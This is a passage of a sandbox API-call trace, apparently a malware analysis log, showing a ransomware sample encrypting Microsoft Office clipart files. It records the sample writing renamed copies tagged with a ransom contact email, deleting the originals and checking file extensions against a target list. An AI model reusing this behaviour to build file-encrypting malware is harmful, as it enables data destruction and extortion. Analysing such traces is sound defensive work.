lpNumberOfBytesWritten=0x268fc94*=0x23e0, lpOverlapped=0x0) returned 1 [0068.461] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.461] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.461] SetEndOfFile (hFile=0x368) returned 1 [0068.461] CloseHandle (hObject=0x368) returned 1 [0068.461] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.461] SetEndOfFile (hFile=0x388) returned 1 [0068.462] CloseHandle (hObject=0x388) returned 1 [0068.462] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.462] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00557_.wmf")) returned 1 [0068.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 68 [0068.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 68 [0068.463] lstrlenW (lpString=".doc") returned 4 [0068.463] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.463] lstrlenW (lpString=".docx") returned 5 [0068.463] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.463] lstrlenW (lpString=".pdf") returned 4 [0068.463] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.463] lstrlenW (lpString=".xls") returned 4 [0068.463] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.463] lstrlenW (lpString=".xlsx") returned 5 [0068.463] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.463] lstrlenW (lpString=".ppt") returned 4 [0068.463] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 68 [0068.463] lstrlenW (lpString=".zip") returned 4 [0068.463] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.463] lstrlenW (lpString=".rar") returned 4 [0068.463] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.463] lstrlenW (lpString=".bz2") returned 4 [0068.463] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.463] lstrlenW (lpString=".7z") returned 3 [0068.463] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 68 [0068.463] lstrlenW (lpString=".dbf") returned 4 [0068.463] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 68 [0068.464] lstrlenW (lpString=".1cd") returned 4 [0068.464] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 68 [0068.464] lstrlenW (lpString=".jpg") returned 4 [0068.464] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.464] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.464] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00915_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0068.465] GetLastError () returned 0x0 [0068.465] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x31cc, lpOverlapped=0x0) returned 1 [0068.467] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x31d0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x31d0, lpOverlapped=0x0) returned 1 [0068.468] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.468] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.468] SetEndOfFile (hFile=0x368) returned 1 [0068.468] CloseHandle (hObject=0x368) returned 1 [0068.468] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.468] SetEndOfFile (hFile=0x388) returned 1 [0068.469] CloseHandle (hObject=0x388) returned 1 [0068.469] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.469] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00915_.wmf")) returned 1 [0068.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 68 [0068.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 68 [0068.470] lstrlenW (lpString=".doc") returned 4 [0068.470] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.470] lstrlenW (lpString=".docx") returned 5 [0068.470] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.470] lstrlenW (lpString=".pdf") returned 4 [0068.470] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.470] lstrlenW (lpString=".xls") returned 4 [0068.470] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.470] lstrlenW (lpString=".xlsx") returned 5 [0068.470] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.470] lstrlenW (lpString=".ppt") returned 4 [0068.470] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 68 [0068.470] lstrlenW (lpString=".zip") returned 4 [0068.470] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.470] lstrlenW (lpString=".rar") returned 4 [0068.470] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.470] lstrlenW (lpString=".bz2") returned 4 [0068.470] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.470] lstrlenW (lpString=".7z") returned 3 [0068.470] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 68 [0068.470] lstrlenW (lpString=".dbf") returned 4 [0068.470] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 68 [0068.470] lstrlenW (lpString=".1cd") returned 4 [0068.470] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 68 [0068.470] lstrlenW (lpString=".jpg") returned 4 [0068.470] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.471] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.471] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00919_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0068.471] GetLastError () returned 0x0 [0068.471] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x1b08, lpOverlapped=0x0) returned 1 [0068.473] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1b10, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1b10, lpOverlapped=0x0) returned 1 [0068.473] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.473] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.474] SetEndOfFile (hFile=0x368) returned 1 [0068.474] CloseHandle (hObject=0x368) returned 1 [0068.474] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.474] SetEndOfFile (hFile=0x388) returned 1 [0068.475] CloseHandle (hObject=0x388) returned 1 [0068.475] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.475] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00919_.wmf")) returned 1 [0068.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 68 [0068.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 68 [0068.475] lstrlenW (lpString=".doc") returned 4 [0068.475] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.475] lstrlenW (lpString=".docx") returned 5 [0068.475] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.475] lstrlenW (lpString=".pdf") returned 4 [0068.475] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.475] lstrlenW (lpString=".xls") returned 4 [0068.475] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.475] lstrlenW (lpString=".xlsx") returned 5 [0068.475] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.476] lstrlenW (lpString=".ppt") returned 4 [0068.476] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 68 [0068.476] lstrlenW (lpString=".zip") returned 4 [0068.476] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.476] lstrlenW (lpString=".rar") returned 4 [0068.476] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.476] lstrlenW (lpString=".bz2") returned 4 [0068.476] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.476] lstrlenW (lpString=".7z") returned 3 [0068.476] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 68 [0068.476] lstrlenW (lpString=".dbf") returned 4 [0068.476] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 68 [0068.476] lstrlenW (lpString=".1cd") returned 4 [0068.476] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 68 [0068.476] lstrlenW (lpString=".jpg") returned 4 [0068.476] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.476] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.476] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00956_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0068.477] GetLastError () returned 0x0 [0068.477] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x4e8, lpOverlapped=0x0) returned 1 [0069.042] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0069.043] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.043] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.043] SetEndOfFile (hFile=0x368) returned 1 [0069.043] CloseHandle (hObject=0x368) returned 1 [0069.043] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.043] SetEndOfFile (hFile=0x388) returned 1 [0069.044] CloseHandle (hObject=0x388) returned 1 [0069.044] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.044] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00956_.wmf")) returned 1 [0069.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 68 [0069.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 68 [0069.045] lstrlenW (lpString=".doc") returned 4 [0069.045] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.045] lstrlenW (lpString=".docx") returned 5 [0069.045] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0069.045] lstrlenW (lpString=".pdf") returned 4 [0069.045] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.045] lstrlenW (lpString=".xls") returned 4 [0069.045] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.045] lstrlenW (lpString=".xlsx") returned 5 [0069.045] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0069.045] lstrlenW (lpString=".ppt") returned 4 [0069.045] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 68 [0069.045] lstrlenW (lpString=".zip") returned 4 [0069.045] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.045] lstrlenW (lpString=".rar") returned 4 [0069.045] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.045] lstrlenW (lpString=".bz2") returned 4 [0069.045] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.045] lstrlenW (lpString=".7z") returned 3 [0069.045] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 68 [0069.046] lstrlenW (lpString=".dbf") returned 4 [0069.046] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 68 [0069.046] lstrlenW (lpString=".1cd") returned 4 [0069.046] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 68 [0069.046] lstrlenW (lpString=".jpg") returned 4 [0069.046] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.047] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.047] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.047] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086384.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0069.047] GetLastError () returned 0x0 [0069.047] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x2606, lpOverlapped=0x0) returned 1 [0069.080] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x2610, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x2610, lpOverlapped=0x0) returned 1 [0069.081] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.081] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.081] SetEndOfFile (hFile=0x368) returned 1 [0069.083] CloseHandle (hObject=0x368) returned 1 [0069.084] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.084] SetEndOfFile (hFile=0x388) returned 1 [0069.086] CloseHandle (hObject=0x388) returned 1 [0069.087] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.087] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086384.wmf")) returned 1 [0069.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF") returned 68 [0069.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF") returned 68 [0069.087] lstrlenW (lpString=".doc") returned 4 [0069.087] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.087] lstrlenW (lpString=".docx") returned 5 [0069.087] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0069.087] lstrlenW (lpString=".pdf") returned 4 [0069.087] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.087] lstrlenW (lpString=".xls") returned 4 [0069.087] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.087] lstrlenW (lpString=".xlsx") returned 5 [0069.087] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0069.087] lstrlenW (lpString=".ppt") returned 4 [0069.087] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF") returned 68 [0069.087] lstrlenW (lpString=".zip") returned 4 [0069.087] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.087] lstrlenW (lpString=".rar") returned 4 [0069.087] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.088] lstrlenW (lpString=".bz2") returned 4 [0069.088] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.088] lstrlenW (lpString=".7z") returned 3 [0069.088] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF") returned 68 [0069.088] lstrlenW (lpString=".dbf") returned 4 [0069.088] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF") returned 68 [0069.088] lstrlenW (lpString=".1cd") returned 4 [0069.088] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF") returned 68 [0069.088] lstrlenW (lpString=".jpg") returned 4 [0069.088] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.088] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.088] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0089945.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0069.089] GetLastError () returned 0x0 [0069.089] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x4dba, lpOverlapped=0x0) returned 1 [0069.131] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x4dc0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x4dc0, lpOverlapped=0x0) returned 1 [0069.132] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.132] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.132] SetEndOfFile (hFile=0x370) returned 1 [0069.135] CloseHandle (hObject=0x370) returned 1 [0069.136] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.136] SetEndOfFile (hFile=0x388) returned 1 [0069.137] CloseHandle (hObject=0x388) returned 1 [0069.137] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.138] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0089945.wmf")) returned 1 [0069.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF") returned 68 [0069.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF") returned 68 [0069.138] lstrlenW (lpString=".doc") returned 4 [0069.138] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.138] lstrlenW (lpString=".docx") returned 5 [0069.138] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0069.138] lstrlenW (lpString=".pdf") returned 4 [0069.138] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.138] lstrlenW (lpString=".xls") returned 4 [0069.138] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.138] lstrlenW (lpString=".xlsx") returned 5 [0069.139] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0069.139] lstrlenW (lpString=".ppt") returned 4 